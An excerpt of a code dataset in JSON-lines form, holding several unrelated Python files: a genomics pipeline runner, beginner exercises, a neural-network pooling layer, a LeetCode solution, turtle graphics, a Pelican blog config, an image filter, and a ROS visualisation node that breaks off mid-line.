'+str(option['thread'])\r\n if 'ram' in option:\r\n ' -m '+str(1000 if option['ram'] > 1 else int(option['ram']*1000))+'M'\r\n cmd += ' -O bam -o '+output + ' ' + input\r\n return self.execCmd(cmd)\r\n\r\n def runSamtoolIndex(self, input=''):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'samtools index '+ input\r\n return self.execCmd(cmd)\r\n\r\n def runPicardMD(self, input='', output='', metric = ''):\r\n common.addPath(self.cfg.APPS_DIR)\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'java -jar '+os.path.join(self.cfg.APPS_DIR,'picard.jar') + ' MarkDuplicates'\r\n cmd += ' -I ' + input\r\n cmd += ' -O ' + output\r\n cmd += ' -M ' + metric\r\n return self.execCmd(cmd)\r\n\r\n def runTVC(self, input = '', output = '', ref = '', \r\n option = { 'param' : '', 'motif' : '', 'thread':8, 'target':None, 'hotspot': None }):\r\n common.addPath(os.path.join(self.cfg.APPS_DIR,'TVC', 'bin'))\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'python2 ' + os.path.join(self.cfg.APPS_DIR, 'TVC', 'bin', 'variant_caller_pipeline.py') + \\\r\n ' --input-bam '+input + \\\r\n ' --reference-fasta ' + ref + \\\r\n ' --parameters-file ' + option['param'] + \\\r\n ' --error-motifs ' + option['motif'] + \\\r\n ' --generate-gvcf'\r\n if 'target' in option and option['target']:\r\n cmd += ' --region-bed ' + option['target']\r\n if 'hotspot' in option and option['hotspot']:\r\n cmd += ' --hotspot-vcf ' + option['hotspot']\r\n if 'control' in option and option['control']:\r\n cmd += ' --normal-bam ' + option['control']\r\n if 'thread' in option and 1 < option['thread']:\r\n cmd += ' --num-threads ' + str(option['thread'])\r\n cmd += ' --output-dir ' + output\r\n return self.execCmd(cmd)\r\n\r\n def runBCFVarCall(self, input = '', output = '', ref = '', option = {}):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'bcftools mpileup -Ou' + \\\r\n ' -f ' + ref + ' ' + input + \\\r\n ' | bcftools call -vm -Oz -o ' + output + '.vcf.gz'\r\n return self.execCmd(cmd)\r\n \r\n def hasGATKRefDict(self, refpath = ''):\r\n fname, ext = os.path.splitext(os.path.basename(refpath))\r\n return os.path.exists(os.path.join(self.cfg.REFERENCE_DIR, fname + '.dict'))\r\n\r\n def makeGATKRefDict(self, refpath = ''):\r\n cmd = 'gatk CreateSequenceDictionary -R ' + refpath\r\n return self.execCmd(cmd)\r\n\r\n def hasGATKFeatureIndex(self, feature):\r\n return os.path.exists(feature + '.idx')\r\n \r\n def makeGATKFeatureIndex(self, feature):\r\n cmd = 'gatk IndexFeatureFile -I ' + feature\r\n return self.execCmd(cmd)\r\n\r\n def runGATKBRecal(self, input = '', output = '', ref = '', known = '', option={}):\r\n common.addPath(os.path.join(self.cfg.APPS_DIR,'gatk'))\r\n os.chdir(self.cfg.WORK_SPACE)\r\n if not self.hasGATKRefDict(ref):\r\n res = self.makeGATKRefDict(ref)\r\n if not res:\r\n print(' Reference dictionary (.dict) construction error.')\r\n if not self.hasGATKFeatureIndex(known):\r\n res = self.makeGATKFeatureIndex(known)\r\n if not res:\r\n print(' Feature index construction error.')\r\n gatkcmd = 'gatk'\r\n if 'ram' in option:\r\n gatkcmd += ' --java-options \"-Xmx' + str(option['ram'])+'g\"'\r\n cmd = gatkcmd + ' BaseRecalibrator'\r\n cmd += ' -R ' + ref\r\n cmd += ' -I ' + input\r\n cmd += ' --known-sites ' + known\r\n cmd += ' -O ' + output+'_brecal.table'\r\n res = self.execCmd(cmd)\r\n if not res:\r\n return\r\n cmd = gatkcmd + ' ApplyBQSR'\r\n cmd += ' -R ' + ref\r\n cmd += ' -I ' + input\r\n cmd += ' -bqsr ' + output+'_brecal.table'\r\n cmd += ' -O ' + output\r\n return self.execCmd(cmd)\r\n\r\n def runGATKVarCall(self, input = '', output = '', ref = '', option={}):\r\n common.addPath(os.path.join(self.cfg.APPS_DIR, 'gatk'))\r\n os.chdir(self.cfg.WORK_SPACE)\r\n if not self.hasGATKRefDict(ref):\r\n res = self.makeGATKRefDict(ref)\r\n if not res:\r\n print(' Reference dictionary (.dict) construction error.')\r\n cmd = 'gatk'\r\n if 'ram' in option:\r\n cmd += ' --java-options \"-Xmx' + str(option['ram'])+'g\"'\r\n cmd += ' HaplotypeCaller'\r\n if 'target' in option and os.path.exists(option['target']):\r\n cmd += ' -L ' + option['target']\r\n cmd += ' -R ' + ref + \\\r\n ' -I ' + input + \\\r\n ' -O ' + output + \\\r\n '.g.vcf.gz -ERC GVCF -G StandardAnnotation -G AS_StandardAnnotation -G StandardHCAnnotation'\r\n res = self.execCmd(cmd)\r\n if not res:\r\n print(' Failed to export gvcf.')\r\n return\r\n cmd = 'gatk'\r\n if 'ram' in option:\r\n cmd += ' --java-options \"-Xmx' + str(option['ram'])+'g\"'\r\n cmd += ' GenotypeGVCFs'\r\n cmd += ' -R ' + ref + \\\r\n ' -V ' + output + '.g.vcf.gz' + \\\r\n ' -O ' + output + '.vcf.gz'\r\n return self.execCmd(cmd)\r\n \r\n def runGATKVRecal(self, input = '', output = '', ref = '', resources = [], option={}):\r\n common.addPath(os.path.join(self.cfg.APPS_DIR, 'gatk'))\r\n os.chdir(self.cfg.WORK_SPACE)\r\n gatkcmd = 'gatk'\r\n if 'ram' in option:\r\n gatkcmd += ' --java-options \"-Xmx' + str(option['ram'])+'g\"'\r\n cmd = gatkcmd + ' VariantRecalibrator'\r\n cmd += ' -R ' + ref + \\\r\n ' -V ' + input + \\\r\n ' -O ' + output + '_snp.recal'\r\n for resource in resources:\r\n cmd += ' --resource ' + resource\r\n cmd += ' -tranche 100.0 -tranche 99.9 -tranche 99.0 -tranche 90.0 -an QD -an MQ -an MQRankSum -an ReadPosRankSum -an FS -an SOR -mode SNP'\r\n cmd += ' --tranches-file ' + output + '_snp.tranches'\r\n res = self.execCmd(cmd)\r\n if not res:\r\n print(' Variant(SNP) recalibration has failed.')\r\n return\r\n cmd = gatkcmd + ' ApplyVQSR'\r\n cmd += ' -V ' + input\r\n cmd += ' --recal-file ' + output + '_snp.recal'\r\n cmd += ' --tranches-file ' + output + '_snp.tranches'\r\n cmd += ' -O ' + output + '_snp.vcf'\r\n cmd += ' -mode SNP -truth-sensitivity-filter-leve 99.5 --create-output-variant-index true'\r\n res = self.execCmd(cmd)\r\n if not res:\r\n print(' Variant(SNP) recalibration apply has failed.')\r\n return\r\n cmd = gatkcmd + ' VariantRecalibrator'\r\n cmd += ' -R ' + ref + \\\r\n ' -V ' + input + \\\r\n ' -O ' + output + '_indel.recal'\r\n for resource in resources:\r\n cmd += ' --resource ' + resource\r\n cmd += ' -tranche 100.0 -tranche 99.9 -tranche 99.0 -tranche 90.0 -an QD -an MQ -an MQRankSum -an ReadPosRankSum -an FS -an SOR -mode INDEL'\r\n cmd += ' --tranches-file ' + output + '_indel.tranches'\r\n res = self.execCmd(cmd)\r\n if not res:\r\n print(' Variant(InDel) recalibration has failed.')\r\n return\r\n cmd = gatkcmd + ' ApplyVQSR'\r\n cmd += ' -V ' + input\r\n cmd += ' --recal-file ' + output + '_indel.recal'\r\n cmd += ' --tranches-file ' + output + '_indel.tranches'\r\n cmd += ' -O ' + output + '_indel.vcf'\r\n cmd += ' -mode INDEL -truth-sensitivity-filter-leve 99.0 --create-output-variant-index true'\r\n res = self.execCmd(cmd)\r\n if not res:\r\n print(' Variant(InDel) recalibration apply has failed.')\r\n return\r\n cmd = gatkcmd + 'GatherVcfs -R ' + ref\r\n cmd += ' ' + output + '_indel.vcf ' + output + '_snp.vcf'\r\n cmd += ' -O ' + output + '_recal.vcf'\r\n return self.execCmd(cmd)\r\n \r\n def runGDVCall(self, input = '', output = '', ref = '', \\\r\n option={'gpu': False, 'processor':4, 'target': ''}):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n idir, iname = os.path.split(input)\r\n odir, oname = os.path.split(output)\r\n rdir, rname = os.path.split(ref)\r\n tdir = ''\r\n tname = ''\r\n if 'target' in option:\r\n tdir, tname = os.path.split(option['target'])\r\n cmd = 'sudo docker run'\r\n if 'gpu' in option and option['gpu']:\r\n cmd += ' --gpus 1'\r\n cmd += ' -v \"' + rdir + '\":\"/REF_DIR\"' \r\n cmd += ' -v \"' + idir + '\":\"/INPUT_DIR\"' \r\n cmd += ' -v \"' + odir + '\":\"/OUTPUT_DIR\"' \r\n if tdir != '':\r\n cmd += ' -v \"' + tdir + '\":\"/TARGET_DIR\"' \r\n cmd +=' google/deepvariant:\"' + self.cfg.SOFTWARE_INFO['GDV']['ver'] + '\"' + \\\r\n ' /opt/deepvariant/bin/run_deepvariant --model_type=WGS' \r\n cmd += ' --ref ' + os.path.join('/REF_DIR', rname)\r\n cmd += ' --reads ' + os.path.join('/INPUT_DIR', iname)\r\n if 'target' in option and os.path.exists(option['target']):\r\n cmd += ' --regions ' + os.path.join('/TARGET_DIR', tname)\r\n if 'processor' in option and 0 < option['processor']:\r\n cmd += ' --num_shards ' + str(option['processor'])\r\n cmd += ' --output_gvcf ' + os.path.join('/OUTPUT_DIR', oname+'.g')\r\n cmd += ' --output_vcf ' + os.path.join('/OUTPUT_DIR', oname)\r\n return self.execCmd(cmd)\r\n\r\n def runHTSeqCount(self, input = '', annotation = '', output = '', option = {}):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'htseq-count -r pos -t exon -f bam'\r\n if 'qual' in option:\r\n cmd += ' -a ' + str(option['qual'])\r\n if 'thread' in option:\r\n cmd += ' -n ' + str(option['thread'])\r\n cmd += ' ' + input + ' ' + annotation + ' > ' + output\r\n return self.execCmd(cmd)\r\n\r\n def runCufflinks(self, input = '', annotation = '', output = '', option = {}):\r\n common.addPath(os.path.join(self.cfg.APPS_DIR, 'cuff'))\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'cufflinks --no-update-check'\r\n if 'platform' in option:\r\n if option['platform'] == 'ion':\r\n cmd += ' --library-type fr-secondstrand'\r\n else:\r\n cmd += ' --library-type fr-unstranded'\r\n if 'novel' in option and option['novel']:\r\n cmd += ' -g ' + annotation\r\n else:\r\n cmd += ' -G ' + annotation\r\n if 'mask' in option and os.path.exists(option['mask']):\r\n cmd += ' -M ' + option['mask']\r\n if 'thread' in option:\r\n cmd += ' -p ' + str(option['thread'])\r\n cmd += ' -o ' + output + ' ' + input\r\n return self.execCmd(cmd)\r\n \r\n def runCuffDiff(self, input = '', groups = [], labels = [], reference = '', output = '', option = {}):\r\n common.addPath(os.path.join(self.cfg.APPS_DIR, 'cuff'))\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'cuffdiff --no-update-check'\r\n if 'platform' in option:\r\n if option['platform'] == 'ion':\r\n cmd += ' --library-type fr-secondstrand'\r\n else:\r\n cmd += ' --library-type fr-unstranded'\r\n if 'mask' in option and os.path.exists(option['mask']):\r\n cmd += ' -M ' + option['mask']\r\n if 'mincount' in option:\r\n cmd += ' -c ' + str(option['mincount'])\r\n if 'thread' in option:\r\n cmd += ' -p ' + str(option['thread'])\r\n if 'control' in option and option['control']:\r\n cmd += ' -g ' + option['control']\r\n cmd += ' -u -b ' + reference + ' -o ' + output\r\n for label in labels:\r\n cmd += label + ','\r\n cmd[-1] = ' '\r\n cmd += input\r\n for group in groups:\r\n cmd += ' '\r\n for reads in group:\r\n cmd += reads + ','\r\n cmd = cmd[:-1]\r\n return self.execCmd(cmd)\r\n\r\n def runCuffMerge(self, input = '', reference = '', option = {}):\r\n common.addPath(os.path.join(self.cfg.APPS_DIR, 'cuff'))\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'cuffmerge --no-update-check'\r\n if 'thread' in option:\r\n cmd += ' -p ' + str(option['thread'])\r\n cmd += ' -s ' + reference + ' ' + input\r\n return self.execCmd(cmd)\r\n\r\n def runEdgeR(self, script = '', output = '', args = []):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n return self.runRScript(script, output, args)\r\n\r\n def runMACS2(self, input = '', control = None, output = '', species = '', genome = 0, \r\n option = { 'bload' : True, 'lambda' : True, 'p-val' : -1, 'q-val': -1}):\r\n os.chdir(self.cfg.WORK_SPACE)\r\n cmd = 'macs2 callpeak -f BAM -t ' + input\r\n if control :\r\n cmd = ' -c ' + control\r\n if len(species) : \r\n cmd += ' -g ' + species\r\n else :\r\n cmd += ' -g ' + '{:.1E}'.format(genome)\r\n if not option['bload']:\r\n cmd += ' --broad'\r\n if not option['lamda']:\r\n cmd += ' --nolambda'\r\n if 'p-val' in option and -1 < option['p-val']:\r\n cmd += ' -p ' + '{:.1E}'.format(option['p-val'])\r\n if 'q-val' in option and -1 < option['q-val']:\r\n cmd += ' -q ' + '{:.1E}'.format(option['q-val'])\r\n cmd += ' --outdir ' + self.cfg.OUT_DIR + ' -n ' + output\r\n return self.execCmd(cmd)\r\n\r\n#def runMeme():\r\n\r\n\r\n","repo_name":"YujiSue/ysngs","sub_path":"ysngs/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":20807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34160032230","text":"# Write a program that displays integer numbers in the range of <1..20>.\n\n# for number in range(1,21):\n# print(number,end=\" \")\n\nnumber = 1\nwhile number <= 20:\n print(number, end=\" \")\n number += 1\n\n#zaczynamy od 1 (nu,ber =1) i po każdym przejściu zwiększamy wartość o 1 (nu,ber += 1)\n#end=\" \" dodanie spacji, wszystko w jednym wierszu, zamiast każdego wykonania w osobnym","repo_name":"Hybrydyzacja/pp1_2022","sub_path":"03-ControlStructures/11.py","file_name":"11.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"7382429742","text":"# -*- coding: utf-8 -*-\n\nimport numpy as np\n\nfrom .base import Layer\nfrom ztlearn.utils import get_pad\nfrom ztlearn.utils import im2col_indices\nfrom ztlearn.utils import col2im_indices\nfrom ztlearn.utils import get_output_dims\n\n\nclass Pool(Layer):\n\n def __init__(self, pool_size = (2, 2), strides = (1, 1), padding = 'valid'):\n self.pool_size = pool_size\n self.strides = strides\n self.padding = padding\n\n self.is_trainable = True\n\n @property\n def trainable(self):\n return self.is_trainable\n\n @trainable.setter\n def trainable(self, is_trainable):\n self.is_trainable = is_trainable\n\n @property\n def output_shape(self):\n input_channels, input_height, input_width = self.input_shape\n\n self.pad_height, self.pad_width = get_pad(self.padding,\n input_height,\n input_width,\n self.strides[0],\n self.strides[1],\n self.pool_size[0],\n self.pool_size[1])\n\n output_height, output_width = get_output_dims(input_height, input_width, self.pool_size, self.strides, self.padding)\n\n assert output_height % 1 == 0\n assert output_width % 1 == 0\n\n return input_channels, int(output_height), int(output_width)\n\n def prep_layer(self): pass\n\n def pass_forward(self, inputs, train_mode = True, **kwargs):\n input_num, input_depth, input_height, input_width = inputs.shape\n self.inputs = inputs\n\n assert (input_height - self.pool_size[0]) % self.strides[0] == 0, 'Invalid height'\n assert (input_width - self.pool_size[1]) % self.strides[1] == 0, 'Invalid width'\n\n output_height, output_width = get_output_dims(input_height, input_width, self.pool_size, self.strides)\n\n input_reshaped = inputs.reshape(input_num * input_depth, 1, input_height, input_width)\n self.input_col = im2col_indices(input_reshaped,\n self.pool_size[0],\n self.pool_size[1],\n padding = (self.pad_height, self.pad_width),\n stride = self.strides[0])\n\n output, self.pool_cache = self.pool_forward(self.input_col)\n\n output = output.reshape(int(output_height), int(output_width), input_num, input_depth)\n\n return output.transpose(2, 3, 0, 1)\n\n def pass_backward(self, grad, epoch_num, batch_num, batch_size):\n input_num, input_depth, input_height, input_width = self.inputs.shape\n\n d_input_col = np.zeros_like(self.input_col)\n grad_col = grad.transpose(2, 3, 0, 1).ravel()\n\n d_input_col = self.pool_backward(d_input_col, grad_col, self.pool_cache)\n d_input = col2im_indices(d_input_col,\n (input_num * input_depth, 1, input_height, input_width),\n self.pool_size[0],\n self.pool_size[1],\n padding = (self.pad_height, self.pad_width),\n stride = self.strides[0])\n\n return d_input.reshape(self.inputs.shape)\n\n\nclass MaxPooling2D(Pool):\n\n def __init__(self, pool_size = (2, 2), strides = (1, 1), padding = 'valid'):\n super(MaxPooling2D, self).__init__(pool_size, strides, padding)\n\n def pool_forward(self, input_col):\n max_id = np.argmax(input_col, axis = 0)\n out = input_col[max_id, range(max_id.size)]\n\n return out, max_id\n\n def pool_backward(self, d_input_col, grad_col, pool_cache):\n d_input_col[pool_cache, range(grad_col.size)] = grad_col\n\n return d_input_col\n\n\nclass AveragePool2D(Pool):\n\n def __init__(self, pool_size = (2, 2), strides = (1, 1), padding = 'valid'):\n super(AveragePool2D, self).__init__(pool_size, strides, padding)\n\n def pool_forward(self, input_col):\n out = np.mean(input_col, axis = 0)\n\n return out, None\n\n def pool_backward(self, d_input_col, grad_col, pool_cache = None):\n d_input_col[:, range(grad_col.size)] = 1. / d_input_col.shape[0] * grad_col\n\n return d_input_col\n","repo_name":"jefkine/zeta-learn","sub_path":"ztlearn/dl/layers/pooling.py","file_name":"pooling.py","file_ext":"py","file_size_in_byte":4610,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"71"} +{"seq_id":"5931164070","text":"# Write a function that takes a string as input and reverse only the vowels of a string.\n\n# Example 1:\n# Given s = \"hello\", return \"holle\".\n\n# Example 2:\n# Given s = \"leetcode\", return \"leotcede\".\n\n# Note:\n# The vowels does not include the letter \"y\".\n\n\n\nclass Solution(object):\n def reverseVowels(self, s):\n \"\"\"\n :type s: str\n :rtype: str\n \"\"\"\n vowels = set('aeiouAEIOU')\n i, j = 0, len(s)-1\n s = list(s)\n while i < j:\n if s[i] in vowels and s[j] in vowels:\n s[i], s[j] = s[j], s[i]\n i += 1\n j -= 1\n elif s[i].lower() in vowels:\n j -= 1\n elif s[j].lower() in vowels:\n i += 1\n else:\n i += 1\n j -= 1\n return ''.join(s)\n ","repo_name":"yemao616/summer18","sub_path":"Google/1. easy/345. Reverse Vowels of a String.py","file_name":"345. Reverse Vowels of a String.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"17682146614","text":"import turtle\nimport os\n\ndef star(t, angle, side, limit, turningPoint = 200):\n t.forward(side)\n if side % (turningPoint*2) == 0:\n angle += 2\n elif side % turningPoint == 0:\n angle -= 2\n\n t.right(angle)\n side += 2\n\n if side < limit:\n star(t, angle, side, limit)\n\ndef draw(angle, side, limit, turningPoint = 200, save = False, filename = None):\n window = turtle.Screen()\n window.bgcolor(\"black\")\n t = turtle.Turtle()\n t.pencolor(\"white\")\n t.width(1)\n turtle.tracer(100, None)\n star(t, angle, side, limit, turningPoint)\n if save and filename != None:\n path = os.getcwd() + r\"\\\\\"\n cv = turtle.getscreen().getcanvas()\n cv.postscript(file = path + filename + \".ps\", colormode=\"color\")\n turtle.clearscreen()\n\nfor i in [119, 120, 121, 110, 135, 140, 180]:\n draw(i, 0, 1200, 200, save=True, filename=f\"star{i}\")","repo_name":"rAlphabet/CreativePie","sub_path":"Geometric Rose/stars.py","file_name":"stars.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"71"} +{"seq_id":"24921915778","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\nfrom __future__ import unicode_literals\n\nAUTHOR = 'calvin.zhang'\nSITENAME = \"zjlog is zj'blog\"\nSITEURL = ''\nPATH = 'content'\n\n# theme and plugins config\nTHEME = \"./themes/pelican-elegant\" \nMARKUP = ('md', 'ipynb')\nPLUGIN_PATHS = [ './plugins' ]\nPLUGINS = ['ipynb.markup','tipue_search','sitemap','extract_toc']\nSTATIC_PATHS = ['theme/images', 'images']\nSITEMAP = { \n 'format': 'xml', \n 'priorities': { \n 'articles': 1, \n 'indexes': 0.7, \n 'pages': 0.5 \n }, \n 'changefreqs': { \n 'articles': 'always', \n 'indexes': 'always', \n 'pages': 'always' \n } \n} \nDIRECT_TEMPLATES = (('index', 'tags', 'categories','archives', 'search', '404'))\n\n# About & project\n\nLANDING_PAGE_ABOUT = {\n \"title\":\"数据挑山工\",\n \"details\":\"hello\"\n}\n\nPROJECTS = [{\n 'name': 'Logpad + Duration',\n 'url': 'https://github.com/talha131/logpad-plus-duration#logpad--duration',\n 'description': 'Vim plugin to emulate Windows Notepad logging feature,'\n ' and log duration of each entry'},\n {'name': 'Elegant Theme for Pelican',\n 'url': 'http://oncrashreboot.com/pelican-elegant',\n 'description': 'A clean and distraction free theme, with search and a'\n ' lot more unique features, using Jinja2 and Bootstrap'}]\n\nTIMEZONE = 'Asia/Shanghai'\nDEFAULT_LANG = 'zh'\n\n# Feed generation is usually not desired when developing\nFEED_ALL_ATOM = None\nCATEGORY_FEED_ATOM = None\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\n# Blogroll\nLINKS = (('Pelican', 'http://getpelican.com/'),\n ('Python.org', 'http://python.org/'),\n ('Jinja2', 'http://jinja.pocoo.org/'),\n ('You can modify those links in your config file', '#'),)\n\n# Social widget\nSOCIAL = (('You can add links in your config file', '#'),\n ('Another social link', '#'),)\n\nDEFAULT_PAGINATION = False\n\n# Uncomment following line if you want document-relative URLs when developing\n#RELATIVE_URLS = True\n","repo_name":"zjplus/zjplus.github.io-source","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"4006786401","text":"import sys\n\n\ndef kernel_do_filtro(nome_filtro):\n \"\"\"\n Entrada: Uma string que representa um nome de um filtro\n Saída: O uma matriz que representa o'Kernel' correspondente \n ao nome do filtro recebido\n \"\"\"\n\n kernels_filtros = [\n [\n [-1, -1, -1],\n [-1, 8, -1],\n [-1, -1, -1]\n ],\n [\n [0, -1, 0],\n [-1, 5, -1],\n [0, -1, 0]\n ],\n [\n [1, 0, -1],\n [2, 0, -2],\n [1, 0, -1]\n ],\n [\n [-2, -1, 0],\n [-1, 1, 1],\n [0, 1, 2]\n ],\n [\n [0.04, 0.04, 0.04, 0.04, 0.04],\n [0.04, 0.04, 0.04, 0.04, 0.04],\n [0.04, 0.04, 0.04, 0.04, 0.04],\n [0.04, 0.04, 0.04, 0.04, 0.04],\n [0.04, 0.04, 0.04, 0.04, 0.04]\n ],\n [\n [-0.00390625, -0.015625, -0.0234375, -0.015625, -0.00390625],\n [-0.015625, -0.0625, -0.09375, -0.0625, -0.015625],\n [-0.0234375, -0.09375, 1.859375, -0.09375, -0.0234375],\n [-0.015625, -0.0625, -0.09375, -0.0625, -0.015625],\n [-0.00390625, -0.015625, -0.0234375, -0.015625, -0.00390625]\n ]\n ]\n\n nome_filtros = [\n \"bordas\",\n \"sharpen\",\n \"left_sobel\",\n \"emboss\",\n \"blur\",\n \"unsharp\"\n ]\n\n return kernels_filtros[nome_filtros.index(nome_filtro)]\n\n\ndef ler_imagem(nome_imagem):\n \"\"\"\n Entrada: Um caminho de um arquivo ppm\n Saída: A largura, a altura e a matriz com os números que \n correspondem a imagem em si\n \"\"\"\n\n matriz_imagem = []\n\n with open(nome_imagem) as arquivo:\n\n tipo = arquivo.readline().strip()\n largura, altura = map(int, arquivo.readline().strip().split())\n tamanho_maximo = arquivo.readline().strip()\n\n for linha in arquivo:\n linha = list(map(int, linha.split()))\n matriz_imagem.append(linha)\n\n return largura, altura, matriz_imagem\n\n\ndef calcula_matriz_pixels_convolucao(i, j, fator, matriz_imagem):\n \"\"\"\n Entrada: posição [i][j] do elemento da [matriz_imagem] e o [fator],\n que serve para saber quantas linhas e colunas serão analisadas para \n a realização da convolução\n Saída: uma matriz com lista de elementos da [matriz_imagem] que serão \n usados no cálculo da convolução do elemento na posição [i][j]\n \"\"\"\n\n pixels_convolucao = []\n\n \"\"\"\n As variáveis 'l' e 'k' serve para saber quantas linhas e colunas, \n respectivamente, acima e abaixo do elemento na posição [i][j] temos \n que verificar para achar os outros elementos adjacentes a ele que \n serão usados para fazer a convolucao\n \"\"\"\n\n for l in range(-fator, fator+1):\n\n linha = []\n for k in range(-fator, fator+1):\n\n pixel_adjacente = matriz_imagem[i + l][j + k*3]\n\n linha.append(pixel_adjacente)\n\n pixels_convolucao.append(linha)\n\n return pixels_convolucao\n\n\ndef verifica_dentro_range(novo_elemento):\n\n # Verificando se o elemento não saiu do range(0,255)\n if novo_elemento > 255:\n return 255\n elif novo_elemento < 0:\n return 0\n\n return novo_elemento\n\n\ndef aplicar_filtro(largura, altura, matriz_imagem, kernel):\n\n matriz_imagem_filtrada = []\n\n largura *= 3\n tamanho_kernel = len(kernel)\n\n # Para saber quantas linhas acima e abaixo do elemento vou ter que usar na soma\n # É necessário para casos onde o kernel é diferente do padrão 3x3\n fator = tamanho_kernel // 2\n\n for i in range(altura):\n linha = []\n for j in range(largura):\n novo_elemento = 0\n\n # Verificando se o elemento não está na borda\n if (i >= (1*fator) and i < (altura - (1*fator))) and (j >= (3*fator) and j < (largura - (3*fator))):\n\n # Chamando a função para achar os elementos que serão usados na convolução\n pixels_para_convolucao = calcula_matriz_pixels_convolucao(\n i, j, fator, matriz_imagem)\n\n # Realizando a convolução para achar o novo elemento da posição [i][j]\n for l in range(len(kernel)):\n for k in range(len(kernel)):\n novo_elemento += pixels_para_convolucao[l][k] * \\\n kernel[l][k]\n\n novo_elemento = verifica_dentro_range(novo_elemento)\n\n linha.append(int(novo_elemento))\n matriz_imagem_filtrada.append(linha)\n\n return matriz_imagem_filtrada\n\n\ndef escrever_imagem(largura, altura, matriz_filtrada, nome_arquivo):\n \"\"\"\n Entrada: a largura e a altura da imagem, uma matriz que representa\n a imagem com o filtro aplicado e o nome do arquivo a ser criado\n Saída: Não retorna nada, mas cria um arquivo com o nome recebido\n contendo as informações recebidas\n \"\"\"\n\n with open(nome_arquivo, \"w\") as arquivo:\n arquivo.write(\"P3\\n\")\n arquivo.write(f\"{largura} {altura}\\n\")\n arquivo.write(f\"255\\n\")\n\n for linha in matriz_filtrada:\n linha_arquivo = ' '.join(map(str, linha))\n\n arquivo.write(f\"{linha_arquivo}\\n\")\n\n\ndef main():\n\n if(len(sys.argv) >= 4):\n nome_filtro = sys.argv[1]\n nome_imagem = sys.argv[2]\n nome_nova_imagem = sys.argv[3]\n\n kernel = kernel_do_filtro(nome_filtro)\n largura, altura, matriz_imagem = ler_imagem(nome_imagem)\n matriz_filtrada = aplicar_filtro(largura, altura, matriz_imagem, kernel)\n\n escrever_imagem(largura, altura, matriz_filtrada, nome_nova_imagem)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PauloVictorSS/unicamp-mc102","sub_path":"tarefa07/filtros.py","file_name":"filtros.py","file_ext":"py","file_size_in_byte":5657,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"30702185090","text":"#!/usr/bin/env python\nimport argparse\nimport sys\nimport rospy\nimport numpy as np\nimport copy\nfrom std_msgs.msg import Int32,Float32\nfrom visualization_msgs.msg import Marker, MarkerArray\nfrom tf.transformations import quaternion_from_euler\nfrom geometry_msgs.msg import Quaternion\nfrom squirrel_vad_msgs.msg import RecognisedResult \nfrom threading import Lock\nimport rospkg\n#import yaml\nimport pdb\n\nclass SoundViz(object):\n\tdef __init__(self, a_min, a_max, v_min, v_max, threshold = 0.1):\n\t\tself.lock = Lock()\n\t\tself.lock.acquire()\n\t\tself.marker_pub = rospy.Publisher(\"ser_feature_markers\", MarkerArray, queue_size=1)\n\t\tself.ang1 = 0\n\t\tself.ang2 = 0\n\t\tself.arousal = 0\n\t\tself.valence = 0\n\t\tself.duration = 0.0\n\t\tself.a_min = a_min\n\t\tself.a_max = a_max\n\t\t\n\t\tself.v_min = v_min\n\t\tself.v_max = v_max\n\n\t\tself.threshold = threshold\n\t\tself.vad_sub = rospy.Subscriber(\"speech_duration\", Float32, self.vad_cb, queue_size=1)\n\n\t\tself.arousal_sub = rospy.Subscriber(\"arousal\", RecognisedResult, self.arousal_cb, queue_size=1)\n\t\tself.valence_sub = rospy.Subscriber(\"valence\", RecognisedResult, self.valence_cb, queue_size=1)\n\t\t\n\t\tself.pub_tmr = rospy.Timer(rospy.Duration(0.05), self.tmr_cb, oneshot=False)\n\t\tself.lock.release()\n\t\n\tdef vad_cb(self, msg):\n\t\tself.duration = msg\n\n\tdef arousal_cb(self, msg):\n\t\tself.arousal = msg.label\n\t\tself.arousal = (self.arousal - self.a_min)/float(self.a_max - self.a_min)\n\n\tdef valence_cb(self, msg):\n\t\tself.valence = msg.label\n\t\tself.valence = (self.valence - self.v_min)/float(self.v_max - self.v_min)\t\n\t\n\tdef tmr_cb(self, ev):\n\t\tself.lock.acquire()\n\t\t\n\t\tma1 = Marker()\n\t\tma1.header.frame_id = \"sound\"\n\t\tma1.header.stamp = rospy.Time.now()\n\t\tma1.ns = \"my_namespace\"\n\t\tma1.id = 0\n\t\tma1.type = Marker.SPHERE\n\t\tma1.action = Marker.ADD\n\t\tma1.pose.position.x = 0\n\t\tma1.pose.position.y = 0\n\t\tma1.pose.position.z = 0\n\t\t\n\t\trospy.loginfo(self.duration)\n\t\tma1.scale.x = 1*(1 + self.arousal * 2)\n\t\tma1.scale.y = 1*(1 + self.arousal * 2)\n\t\tma1.scale.z = 1*(1 + self.arousal * 2)\n\t\t\n\t\tma1.color.a = 1.0\n\t\tma1.color.r = 1.0 if self.valence < self.threshold else 0.0\n\t\tma1.color.g = 1.0 if self.valence > self.threshold else 0.0\n\t\tma1.color.b = 1.0 if self.valence == 0.0 